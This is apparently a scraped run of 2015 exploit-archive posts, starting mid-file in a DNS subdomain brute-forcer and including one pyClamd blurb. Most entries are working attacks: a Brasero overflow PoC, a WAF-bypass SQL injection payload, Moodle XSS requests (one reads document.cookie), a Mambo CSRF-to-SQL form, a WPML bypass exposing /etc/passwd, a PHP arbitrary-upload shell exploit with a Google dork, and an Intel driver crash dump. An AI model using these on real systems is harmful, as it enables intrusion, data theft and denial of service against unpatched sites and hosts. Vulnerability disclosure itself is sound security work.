int(opts.charset) == 0: opts.charset = chars + digits elif int(opts.charset) == 1: opts.charset = chars else: opts.charset = digits if not opts.prefix: opts.prefix = prefix if not opts.postfix: opts.postfix = postfix return opts def read_hostnames(opts): print('[+] reading hostnames') hostnames = [] if opts.wordlist: hostnames = list(open(opts.wordlist, 'r')) return hostnames else: return wordlist def attack(opts, hostname, attack_pool): if opts.verbose: sys.stdout.write(' -> trying %s\n' % hostname) sys.stdout.flush() try: x = dns.message.make_query(hostname, 1) if opts.protocol == 'udp': a = dns.query.udp(x, opts.dnshost, float(opts.timeout), 53, None, opts.ipaddr, int(opts.port), True, False) else: a = dns.query.tcp(x, opts.dnshost, float(opts.timeout), 53, None, opts.ipaddr, int(opts.port), False) attack_pool.release() except dns.exception.Timeout: print('[-] ERROR: time out!') sys.exit() except socket.error: print('''[-] ERROR: no connection? ip|srcport incorrectly defined? you can run only one thread if fixed source port specified!''') sys.exit() if a.answer: answ = '' # iterate dns rrset answer (can be multiple sets) field to extract # detailed info (dns and ip) for i in a.answer: answ += str(i[0]) answ += ' ' answer = (hostname, answ) found.append(answer) else: pass return def str_gen(opts, hostnames): print('[+] generating list of strings') tmp_hostnames = itertools.product(opts.charset, repeat=int(opts.max)) hostnames = list(tmp_hostnames) hostnames = map(''.join, hostnames) return hostnames def run_threads(opts, hostname, attack_pool, threads): t = threading.Thread(target=attack, args=(opts, hostname, attack_pool)) attack_pool.acquire() t.start() threads.append(t) return threads def prepare_attack(opts, hostnames): sys.stdout.write('[+] attacking \'%s\' via ' % opts.domain) threads = list() attack_pool = threading.BoundedSemaphore(value=int(opts.threads)) if opts.type == '0': sys.stdout.write('dictionary\n') for hostname in hostnames: hostname = hostname.rstrip() + '.' + opts.domain time.sleep(float(opts.wait)) threads = run_threads(opts, hostname, attack_pool, threads) for t in threads: t.join() elif opts.type == '1': sys.stdout.write('bruteforce\n') hostnames = str_gen(opts, hostnames) for hostname in hostnames: hostname = opts.prefix + hostname + opts.postfix + '.' + opts.domain time.sleep(float(opts.wait)) threads = run_threads(opts, hostname, attack_pool, threads) for t in threads: t.join() else: print('[-] ERROR: unknown attack type') sys.exit() return def ip_extractor(ip): #extract ip from string of rrset answer object try: extracted = re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip) return extracted[0] except: print('[-] ERROR: can\'t extract ip addresses') sys.exit() def analyze_results(opts, found): #get maindomain ip try: mainhostip = socket.gethostbyname(opts.domain) #append domain|ip to diffound if subdomain ip different than starting # domain ip ([diffound.append(domain + ' | ' + ip) for domain, ip in found if ip_extractor(ip) != mainhostip]) except dns.exception.Timeout: sys.exit() except socket.error: print('[-] ERROR: wrong domain or no connection?') sys.exit() return def log_results(opts, found, diffound): if opts.logfile == 'stdout': print('---') if not found: print('no hosts found ') else: print('ANSWERED DNS REQUESTS') print('---') for f in found: print(f[0]+' | '+f[1]) if not diffound: print('---') print('NO HOSTS WITH DIFFERENT IP FOUND ') else: print('---') print('ANSWERED DNS REQUEST WITH DIFFERENT IP') print('---') for domain in diffound: print(domain) else: print('[+] \033[0;94mlogging results to %s\033[0;m' % opts.logfile) with open(opts.logfile, 'w') as f: if found: f.write('---\n') f.write('ANSWERED DNS REQUESTS\n') f.write('---\n') for x in found: f.write('domain: '+x[0]+' | '+x[1]+ '\n') if not diffound: f.write('---\nNO HOSTS WITH DIFFERENT IP FOUND \n') else: f.write('---\nANSWERED DNS REQUEST WITH DIFFERENT IP\n---\n') for domain in diffound: f.write(domain + '\n') f.close() print('[+] game over') return def main(): check_usage() opts = parse_cmdline() check_cmdline(opts) if not opts.dnshost: defaults = get_default_nameserver() if not opts.ipaddr: defaults = get_default_source_ip() if opts.protocol != 'udp' and opts.protocol != 'tcp': print('[-] ERROR: unknown protocol') sys.exit(1337) opts = set_opts(defaults, opts) hostnames = read_hostnames(opts) prepare_attack(opts, hostnames) analyze_results(opts, found) log_results(opts, found, diffound) return if __name__ == '__main__': try: print(BANNER + '\n') main() except KeyboardInterrupt: print('\n[!] WARNING: aborted by user') raise SystemExit # EOF Source

pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product. Changes: This version is compatible with python 3 (tested with 3.2.3) and python 2 (tested 2.7.3). The API for this new version is now object oriented. Useful classes are ClamdNetworkSocket and ClamdUnixSocket. Download

#!/usr/bin/python #Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC #Date Discovered: 15th March' 2015 # Exploit Author: Avinash Kumar Thapa "-Acid" # Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop # Homepage:https://wiki.gnome.org/Apps/Brasero # Tested on: Kali Linux 1.0.9 buffer ="A"*26109 buffer += "CCCC" buffer += "D"*10500 file = "crash.m3u" f = open(file, "w") f.write(buffer) f.close() # After running exploit, run malicious file with brasero CD/DVD burner and check the crash which leads to logged out from your current session. ##################################################################### # -Acid # ##################################################################### Source

*Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards (URL Redirection) Security Vulnerabilities* Exploit Title: Innovative WebPAC Pro 2.0 /showres url parameter URL Redirection Security Vulnerabilities Vendor: Innovative Interfaces Inc Product: WebPAC Pro Vulnerable Versions: 2.0 Tested Version: 2.0 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend) Impact Subscore: 4.9 Exploitability Subscore: 8.6 Discover and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor:* Innovative Interfaces Inc *Product & Version:* WebPAC Pro 2.0 *Vendor URL & Download:* WebPAC Pro can be got from here, http://www.iii.com/products/webpac_pro.shtml http://lj.libraryjournal.com/2005/12/ljarchives/innovative-releasing-webpac-pro/ *Libraries that have installed WebPac Pro:* https://wiki.library.oregonstate.edu/confluence/display/WebOPAC/Libraries+that+have+installed+WebPac+Pro *Product Introduction Overview:* "Today, some libraries want to enhance their online presence in ways that go beyond the traditional OPAC and the "library portal" model to better integrate the latest Web functionality. With WebPAC Pro, libraries will be able to take advantage of the latest Web technologies and engage Web-savvy users more effectively than ever before. WebPAC Pro is a complete update of the Web OPAC interface" "WebPAC Pro breaks through the functional and design limitations of the traditional online catalog. Its solid technology framework supports tools for patron access such as Spell Check; integrated Really Simple Syndication (RSS) feeds; a suite of products for seamless Campus Computing; and deep control over information content and presentation with Cascading Style Sheets (CSS). WebPAC Pro is also a platform for participation when integrated with Innovative's Patron Ratings features and Community Reviews product. What's more, with WebPAC Pro's RightResult™ search technology, the most relevant materials display at the top so patrons get to the specific items or topics they want to explore immediately. WebPAC Pro can also interconnect with Innovative's discovery services platform, Encore. And for elegant access through Blackberry® Storm™ or iPhone™, the AirPAC provides catalog searching, item requesting, and more." *(2) Vulnerability Details:* WebPAC Pro web application has a security bug problem. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs. Other Innovative Interfaces products vulnerabilities have been found by some other bug hunter researchers before. Innovative has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA)). It has published suggestions, advisories, solutions related to Innovative vulnerabilities. *(2.1) *The first code programming flaw occurs at "showres?" page with "&url" parameter. *References:* http://tetraph.com/security/open-redirect/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/innovative-webpac-pro-20-unvalidated.html http://www.inzeed.com/kaleidoscope/computer-web-security/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ https://infoswift.wordpress.com/2015/03/14/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ http://marc.info/?l=full-disclosure&m=142527148510581&w=4 http://en.hackdig.com/wap/?id=17054 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious Source

Document Title: ============ Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution Release Date: =========== 12 Mar 2015 Product & Service Introduction: ======================== Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications. Abstract Advisory Information: ======================= BGA Security Team discovered an HTTP Header Pollution vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable) Vulnerability Disclosure Timeline: ========================= 2 Feb 2015 Bug reported to the vendor. 4 Feb 2015 Vendor returned with a case ID. 5 Feb 2015 Detailed info/config given. 12 Feb 2015 Asked about the case. 16 Feb 2015 Vendor returned "investigating ..." 6 Mar 2015 Asked about the case. 6 Mar 2015 Vendor has validated the issue. 12 Mar 2015 There aren't any fix addressing the issue. Discovery Status: ============= Published Affected Product(s): =============== Citrix Systems, Inc. Product: Citrix Netscaler NS10.5 (other versions may be vulnerable) Exploitation Technique: ================== Remote, Unauthenticated Severity Level: =========== High Technical Details & Description: ======================== It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup: An Apache web server with default configuration on Windows (XAMPP). A SOAP web service which has written in PHP and vulnerable to SQL injection. Netscaler WAF with SQL injection rules. First request: ‘ union select current_user,2# - Netscaler blocks it. Second request: The same content and an additional HTTP header which is “Content-Type: application/octet-stream”. - It bypasses the WAF but the web server misinterprets it. Third request: The same content and two additional HTTP headers which are “Content-Type: application/octet-stream” and “Content-Type: text/xml” in that order. The request is able to bypass the WAF and the web server runs it. Proof of Concept (PoC): ================== Proof of Concept Request: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <string>’ union select current_user, 2#</string> </soapenv:Body> </soapenv:Envelope> Response: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <return xsi:type=“xsd:string”> Name: root@localhost </return> </soap:Body> </soap:Envelope> Solution Fix & Patch: ================ 12 Mar 2015 There aren't any fix addressing the issue. Security Risk: ========== The risk of the vulnerability above estimated as high. Credits & Authors: ============== BGA Bilgi Güvenliði - Onur ALANBEL Disclaimer & Information: =================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bga.com.tr Social: twitter.com/bgasecurity Contact: bilgi@bga.com.tr Copyright © 2015 | BGA Source

Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting Vendor: Moodle Pty Ltd Product web page: https://www.moodle.org Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9 Summary: Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Desc: Moodle suffers from persistent XSS vulnerabilities. Input passed to the POST parameters 'config_title' and 'title' thru index.php, are not properly sanitized allowing the attacker to execute HTML or JS code into user's browser session on the affected site. Affected components: Blocks, Glossary, RSS and Tags. Tested on: nginx PHP/5.4.22 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5236 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php[/url] Vendor Advisory ID: MSA-15-0013 Vendor Advisory URL: [url]https://moodle.org/mod/forum/discuss.php?d=307383[/url] CVE ID: CVE-2015-2269 CVE URL: [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269[/url] 09.02.2015 -- Random Glossary Entry --------------------- POST [url]http://WEB/my/index.php[/url] HTTP/1.1 _qf__block_glossary_random_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=304 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_addentry=test config_invisible=test2 config_refresh=0 config_showconcept=1 config_title=" onmouseover=prompt("XSS1") > config_type=0 config_viewglossary=test3 mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Remote RSS Feeds ---------------- POST [url]http://WEB/my/index.php[/url] HTTP/1.1 _qf__block_rss_client_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=312 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_block_rss_client_show_channel_image=0 config_block_rss_client_show_channel_link=0 config_display_description=0 config_rssid=_qf__force_multiselect_submission config_rssid[]=3 config_shownumentries=11 config_title=" onmouseover=prompt("XSS2") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Tags ---- POST [url]http://WEB/my/index.php[/url] HTTP/1.1 _qf__block_tags_edit_form=1 bui_contexts=0 bui_defaultregion=side-pre bui_defaultweight=4 bui_editid=313 bui_editingatfrontpage=0 bui_pagetypepattern=my-index bui_parentcontextid=411 bui_region=side-pre bui_subpagepattern=%@NULL@% bui_visible=1 bui_weight=4 config_numberoftags=80 config_tagtype= config_title=Tags" onmouseover=prompt("XSS3") > mform_isexpanded_id_configheader=1 mform_isexpanded_id_onthispage=0 mform_isexpanded_id_whereheader=0 sesskey=S8TXvxdEKF submitbutton=Save changes Older not supported versions ---------------------------- POST [url]http://WEB/blog/index.php[/url] HTTP/1.1 blockaction=config filterselect=1343 filtertype=user instanceid=4992 numberoftags=20 sesskey=0QCG5LQz0Q sort=name timewithin=90 title=ZSL"><script>alert(document.cookie);</script> Source

# Affected software: Mambo # Type of vulnerability: csrf to sql injection # URL: http://source.mambo-foundation.org/ # Discovered by: Provensec # Website: http://www.provensec.com #version 4.6.5 # Proof of concept no csrf token were used on sql query form so attacker can leverage csrf to execute sql query on admin end screenshot http://prntscr.com/6gk265 POST /mambo/administrator/index2.php HTTP/1.1 Host: demo.opensourcecms.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://demo.opensourcecms.com/mambo/administrator/index2.php Cookie: __utma=87180614.347131305.1423813196.1426315580.1426317582.5; __utmz=87180614.1424330089.2.2.utmcsr=4homepages.de|utmccn=(referral)|utmcmd=referral|utmcct=/demo/; __gads=ID=e4fef836c4eca064:T=1424329959:S=ALNI_MZOrjDhCaPQBQcowebgQWskHX12kQ; __utmc=87180614; 5503d94d48147_SESSION=ben7euhc7r3j578q73sbnn9oq4; __utmb=87180614.1.10.1426317586; __utmt=1; 25fee453fc1b1d324265b9cb23363e2c=san1g4th13mhokc4g5tk3muaa3; mostlyce[startup_key]=f1df635c5e35c15a244c554e356ad0e3; mostlyce[usertype]=Super+Administrator; webfxtab_modules-cpanel=4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 47 sql=select&option=com_mostlydbadmin&task=xquery vulnerable paramter sql poc <html> <body> <form action=" http://demo.opensourcecms.com/mambo/administrator/index2.php" method="POST"> <input type="hidden" name="sql" value="sql statement to execute " /> <input type="hidden" name="option" value="com_mostlydbadmin" /> <input type="hidden" name="task" value="xquery" /> <input type="submit" value="Submit request" /> </form> </body> </html> Source

One more vulnerability reported on March 02 and fixed in version 3.1.9: *4. Unauthenticated administrative functions* An unauthenticated attacker may under certain conditions bypass WPML's nonce check and perform administrative functions. The administrative ajax functions are protected with nonces to prevent unauthorised use. Login state is not checked. If the nonce check fails with the $_REQUEST values, there is a secondary check that also has to fail before the request is denied: > if (!( isset( $_GET[ 'icl_ajx_action' ] ) && $_GET[ 'nonce' ] == wp_create_nonce( $_GET[ 'icl_ajx_action' ] ) )) { die('Invalid nonce'); } The problem is the mixed use of $_REQUEST and $_GET. If the above check succeeds, subsequent code again uses $_REQUEST instead of $_GET to determine the ajax action to perform. If the attacker has a valid nonce generated by the target WordPress site - from any plug-in or the core system - then they can pass the above check. They can then define a different ajax action in POST parameters to perform administrative functions without authentication. An unauthenticated attacker could then execute any of the about 50 WPML ajax actions intended for administrators only. There is a lot of choice for manipulating or destroying data. For instance, it's possible to define a root html file which is evaluated as include $html_file; This would allow reading server-side files or evaluating PHP code hosted on remote sites (if allowed by PHP settings). A default WordPress installation with only WPML installed apparently doesn't generate nonces for unauthenticated users, so this is probably not exploitable unless there are other plug-ins installed. For example bbpress generates nonces for unauthenticated users. > Proof of concept: > <form method=POST action=" https://YOUR.WORDPRESS.BLOG/?icl_ajx_action=toggle-subscription_10&nonce=1234567890 "> <input type=hidden name="icl_ajx_action" value="icl_save_language_negotiation_type"> <input type=hidden name="_icl_nonce" value="(ignored)"> <input type=hidden name="icl_language_negotiation_type" value="1"> <input type=hidden name="use_directory" value="1"> <input type=hidden name="show_on_root" value="html_file"> <input type=hidden name="root_html_file_path" value="/etc/passwd"> <input type=submit> </form> In the above example, a toggle-subscription nonce generated by bbpress is used. It can be retrieved by unauthenticated users (go to a forum page, view source). On submitting the form, WPML will pass the ajax action because the bbpress nonce is valid. > The ajax action is determined from the POST parameters. In this example, WPML settings would be changed so that contents of /etc/passwd is shown as the default page on the website. This PoC was successfully tested with WPML 3.1.7.2. -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi - Twitter: @klikkioy Source

<?php /* # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload # TIPE: Arbitrary File Upload # Google DORK: inurl:"wp-content/plugins/reflex-gallery/" # Vendor: https://wordpress.org/plugins/reflex-gallery/ # Tested on: Linux # Version: 3.1.3 (Last) # EXECUTE: php exploit.php www.alvo.com.br shell.php # OUTPUT: Exploit_AFU.txt # POC http://i.imgur.com/mpjXaZ9.png # REF COD http://1337day.com/exploit/23369 -------------------------------------------------------------------------------- <form method = "POST" action = "" enctype = "multipart/form-data" > <input type = "file" name = "qqfile"><br> <input type = "submit" name = "Submit" value = "Pwn!"> </form > -------------------------------------------------------------------------------- # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl/ # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA */ error_reporting(1); set_time_limit(0); ini_set('display_errors', 1); ini_set('max_execution_time', 0); ini_set('allow_url_fopen', 1); ob_implicit_flush(true); ob_end_flush(); function __plus() { ob_flush(); flush(); } function __request($params) { $objcurl = curl_init(); curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03"); curl_setopt($objcurl, CURLOPT_POST, 1); curl_setopt($objcurl, CURLOPT_HEADER, 1); curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' => "@{$params['file']}")); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); $info['corpo'] = curl_exec($objcurl) . __plus(); $info['server'] = curl_getinfo($objcurl) . __plus(); curl_close($objcurl) . __plus(); return $info; } echo "[+] Wordpress Plugin Reflex Gallery - Arbitrary File Upload Vulnerability\n\n"; $params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO] DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n")); __request($params) . __plus(); $_s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}"; $_h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach ($_h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; } $_x = (strstr(($_h[0] . (isset($_h[1]) ? $_h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+] {$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) : '[-] ERROR!'); Source

/* Intel Network Adapter Diagnostic Driver IOCTL Handling Vulnerability Vendor: Intel Product webpage: http://www.intel.com Affected product(s): Network Adapter Driver for Windows XP Network Adapter Driver for Windows 7 Network Adapter Driver for Windows 8 Network Adapter Driver for Windows 2008/R2 Network Adapter Driver for Windows 2012/R2 Affected version(s): Intel(R) iQVW64.SYS v1.03.0.7 Intel(R) iQVW32.SYS v1.03.0.7 Tested Operating systems: Windows XP SP3 (32-bit) Windows 7 SP1 (32/64-bit) Date: 14/03/2015 Credits: Glafkos Charalambous CVE: CVE-2015-2291 Disclosure Timeline: 10-06-2014: Vendor Notification 21-06-2014: Vendor Response/Feedback 08-08-2014: Vendor Response/Feedback 26-08-2014: Requesting Status/No Vendor Response 30-09-2014: Requesting Status/No Vendor Response 22-10-2014: Requesting Status/No Vendor Response 10-01-2015: Requesting Status/No Vendor Response 15-01-2015: Requesting Status/No Vendor Response 14-03-2015: CVE Requested 14-03-2015: CVE Assigned 14-03-2015: Public Disclosure Description: A vulnerability in iqvw32.sys and iqvw64e.sys drivers has been discovered in Intel Network Adapter Driver. The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes 0x80862013, 0x8086200B, 0x8086200F, 0x80862007 using METHOD_NEITHER and due to insecure permissions allowing everyone read and write access to privileged use only functionality. Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space. IOCTL 0x80862013 ---------------- Microsoft (R) Windows Debugger Version 6.2.9200.20512 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. Opened \\.\pipe\com_2 Waiting to reconnect... Connected to Windows 7 7601 x64 target at (Thu Feb 26 18:33:59.291 2015 (UTC + 2:00)), ptr64 TRUE Kernel Debugger connection established. Symbol search path is: srv*k:\symbols*http://msdl.microsoft.com/download/symbols;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\google*http://chromium-browser-symsrv.commondatastorage.googleapis.com;SRV*C:\Users\0x414141\AppData\Local\Temp\symbols\microsoft*http://msdl.microsoft.com/download/symbols Executable search path is: Windows 7 Kernel Version 7601 MP (1 procs) Free x64 Built by: 7601.18700.amd64fre.win7sp1_gdr.141211-1742 Machine Name: Kernel base = 0xfffff800`03655000 PsLoadedModuleList = 0xfffff800`03898890 System Uptime: not available KDTARGET: Refreshing KD connection *** Fatal System Error: 0x0000003b (0x00000000C0000005,0xFFFFF88005A0BFD2,0xFFFFF8800653A9C0,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. Connected to Windows 7 7601 x64 target at (Thu Feb 26 20:29:05.978 2015 (UTC + 2:00)), ptr64 TRUE Loading Kernel Symbols ............................................................... ................................................................ ............................... Loading User Symbols ..... Loading unloaded module list ....Unable to enumerate user-mode unloaded modules, Win32 error 0n30 Loading Wow64 Symbols ..... ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 3B, {c0000005, fffff88005a0bfd2, fffff8800653a9c0, 0} *** ERROR: Module load completed but symbols could not be loaded for iqvw64e.sys Followup: MachineOwner --------- nt!RtlpBreakWithStatusInstruction: fffff800`036c3cb0 cc int 3 3: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff88005a0bfd2, Address of the instruction which caused the bugcheck Arg3: fffff8800653a9c0, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. Debugging Details: ------------------ EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s. FAULTING_IP: iqvw64e+3fd2 fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] CONTEXT: fffff8800653a9c0 -- (.cxr 0xfffff8800653a9c0) rax=0000f88005a696d1 rbx=0000000000000001 rcx=00000000deadbeef rdx=0000000080862013 rsi=fffffa804d1084d0 rdi=00000000deadbeef rip=fffff88005a0bfd2 rsp=fffff8800653b3a0 rbp=fffff8800653bb60 r8=fffffa804b0f4d70 r9=000000000000000e r10=0000000000000000 r11=fffff8800653b898 r12=0000000000000003 r13=0000000000000001 r14=0000000000000001 r15=fffffa804aac7b00 iopl=0 nv up ei pl nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010202 iqvw64e+0x3fd2: fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] ds:002b:00000000`deadbeef=???????????????? Resetting default scope DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT BUGCHECK_STR: 0x3B PROCESS_NAME: ConsoleApplica CURRENT_IRQL: 2 LAST_CONTROL_TRANSFER: from fffff88005a091ac to fffff88005a0bfd2 STACK_TEXT: fffff880`0653b3a0 fffff880`05a091ac : fffffa80`4aac7b00 00000000`00000001 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x3fd2 fffff880`0653b8a0 fffff800`039e80f7 : 00000000`80862013 fffff880`0653bb60 fffffa80`4d1084d0 fffffa80`4d01e160 : iqvw64e+0x11ac fffff880`0653b8d0 fffff800`039e8956 : fffff680`003b5ee8 00000000`00000000 00000000`00000000 00000000`00000000 : nt!IopXxxControlFile+0x607 fffff880`0653ba00 fffff800`036cb113 : 00000000`0021df01 0000007f`ffffffff 00000000`0021df00 00000980`00000000 : nt!NtDeviceIoControlFile+0x56 fffff880`0653ba70 00000000`73b02e09 : 00000000`73b02944 00000000`775a01b4 00000000`73b70023 00000000`00000246 : nt!KiSystemServiceCopyEnd+0x13 00000000`0021e898 00000000`73b02944 : 00000000`775a01b4 00000000`73b70023 00000000`00000246 00000000`001dff7c : wow64cpu!CpupSyscallStub+0x9 00000000`0021e8a0 00000000`73b7d286 : 00000000`00000000 00000000`73b01920 00000000`0021eb30 00000000`773decf1 : wow64cpu!DeviceIoctlFileFault+0x31 00000000`0021e960 00000000`73b7c69e : 00000000`00000000 00000000`00000000 00000000`73b74b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa 00000000`0021e9b0 00000000`773f4966 : 00000000`003331f0 00000000`00000000 00000000`774e2670 00000000`774b5978 : wow64!Wow64LdrpInitialize+0x42a 00000000`0021ef00 00000000`773f1937 : 00000000`00000000 00000000`773f4071 00000000`0021f4b0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3 00000000`0021f3f0 00000000`773dc34e : 00000000`0021f4b0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x28ff0 00000000`0021f460 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe FOLLOWUP_IP: iqvw64e+3fd2 fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: iqvw64e+3fd2 FOLLOWUP_NAME: MachineOwner MODULE_NAME: iqvw64e IMAGE_NAME: iqvw64e.sys DEBUG_FLR_IMAGE_TIMESTAMP: 5284eac3 STACK_COMMAND: .cxr 0xfffff8800653a9c0 ; kb FAILURE_BUCKET_ID: X64_0x3B_iqvw64e+3fd2 BUCKET_ID: X64_0x3B_iqvw64e+3fd2 Followup: MachineOwner --------- 3: kd> u fffff880`05a0bfd2 iqvw64e+0x3fd2: fffff880`05a0bfd2 488b11 mov rdx,qword ptr [rcx] fffff880`05a0bfd5 488d0d14160000 lea rcx,[iqvw64e+0x55f0 (fffff880`05a0d5f0)] fffff880`05a0bfdc e84fdfffff call iqvw64e+0x1f30 (fffff880`05a09f30) fffff880`05a0bfe1 488b17 mov rdx,qword ptr [rdi] fffff880`05a0bfe4 488d42ff lea rax,[rdx-1] fffff880`05a0bfe8 4883f807 cmp rax,7 fffff880`05a0bfec 0f8718020000 ja iqvw64e+0x420a (fffff880`05a0c20a) fffff880`05a0bff2 488d0d07c0ffff lea rcx,[iqvw64e (fffff880`05a08000)] 3: kd> !for_each_frame .frame /r @$Frame _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 fffff880`06539988 fffff800`037bba62 